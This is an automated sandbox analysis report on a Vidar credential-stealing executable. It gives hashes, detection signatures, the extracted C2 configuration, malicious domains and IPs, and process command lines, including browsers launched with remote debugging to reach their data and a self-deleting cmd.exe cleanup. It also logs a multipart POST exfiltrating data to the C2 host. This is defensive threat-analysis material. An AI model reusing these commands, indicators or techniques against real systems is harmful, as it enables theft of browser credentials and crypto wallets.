Windows Analysis Report
dZKPE9gotO.exe

Overview

General Information

Sample name:dZKPE9gotO.exe
renamed because original name is a hash value
Original sample name:876a365bda09b9ef39605e375d677f0a.exe
Analysis ID:1576158
MD5:876a365bda09b9ef39605e375d677f0a
SHA1:2c12b38ed2d84722cf5dcea8bd45cfa7d7b55ba4
SHA256:ed252fe89ba1243bad21f373c952b16940a0094149b0be50e5c3da9c20a23234
Tags: exe, user-abuse_ch

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • dZKPE9gotO.exe (PID: 2000 cmdline: "C:\Users\user\Desktop\dZKPE9gotO.exe" MD5: 876A365BDA09B9EF39605E375D677F0A)
    • chrome.exe (PID: 7392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7704 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 1928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 6792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 8352 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8220 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 3064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • msedge.exe (PID: 3952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5088 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5576 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3968 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1318:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: dZKPE9gotO.exe PID: 2000 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

          System Summary

          Source: Process started; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\dZKPE9gotO.exe", ParentImage: C:\Users\user\Desktop\dZKPE9gotO.exe, ParentProcessId: 2000, ParentProcessName: dZKPE9gotO.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7392, ProcessName: chrome.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-12-16T15:39:41.047529+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.7 | 49711 | TCP
          2024-12-16T15:39:43.453157+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.7 | 49720 | TCP
          2024-12-16T15:39:38.746601+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 116.203.12.114 | 443 | TCP

          AV Detection

          Source: dZKPE9gotO.exe; Avira: detected
          Source: https://sedone.online/CWz#; Avira URL Cloud: Label: malware
          Source: https://sedone.online/oWF#; Avira URL Cloud: Label: malware
          Source: https://sedone.online; Avira URL Cloud: Label: malware
          Source: https://sedone.online/pW; Avira URL Cloud: Label: malware
          Source: 0.2.dZKPE9gotO.exe.400000.0.unpack; Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
          Source: dZKPE9gotO.exe; ReversingLabs: Detection: 76%
          Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
          Source: dZKPE9gotO.exe; Joe Sandbox ML: detected
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_0040B006 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0040B006
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_00414B70 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_00414B70
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_009BB26D CryptUnprotectData,LocalAlloc,LocalFree,0_2_009BB26D
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_009C4DD7 CryptBinaryToStringA,GetProcessHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,0_2_009C4DD7

          Compliance

          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Unpacked PE file: 0.2.dZKPE9gotO.exe.400000.0.unpack
          Source: dZKPE9gotO.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
          Source: unknown; HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49701 version: TLS 1.2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040DE0C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_00401825 EntryPoint,FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401825
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040CCF2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_0040B942
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040D820
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_009C92FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009C92FC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_009CAE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,0_2_009CAE0D
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_009C986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C986A
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_009C8952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C8952
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
          Source: chrome.exe; Memory has grown: Private usage: 7MB later: 30MB

          Networking

          Source: Network traffic; Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49704 -> 116.203.12.114:443
          Source: Network traffic; Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.7:49711
          Source: Network traffic; Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.7:49720
          Source: Malware configuration extractor; URLs: https://steamcommunity.com/profiles/76561199807592927
          Source: global traffic; TCP traffic: 192.168.2.7:50848 -> 1.1.1.1:53
          Source: global traffic; HTTP traffic detected: GET /detct0r HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
          Source: Joe Sandbox View; IP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknown; TCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknown; TCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknown; TCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknown; TCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknown; TCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknown; TCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: C:\Users\user\Desktop\dZKPE9gotO.exe; Code function: 0_2_00406C70 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,Sleep,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00406C70
          Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 | Host: sedone.online | Connection: Keep-Alive | Cache-Control: no-cache
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.dr; String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1561375774.00007824024C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
          Source: global traffic | DNS traffic detected: DNS query: t.me
          Source: global traffic | DNS traffic detected: DNS query: sedone.online
          Source: global traffic | DNS traffic detected: DNS query: www.google.com
          Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
          Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
          Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
          Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
          Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
          Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
          Source: global traffic | DNS traffic detected: DNS query: deff.nelreports.net
          Source: unknown | HTTP traffic detected:
            POST / HTTP/1.1
            Content-Type: multipart/form-data; boundary=----MOPHDT0HDJMYUAIWTJE3
            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
            Host: sedone.online
            Content-Length: 256
            Connection: Keep-Alive
            Cache-Control: no-cache
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
          Source: chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172B
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
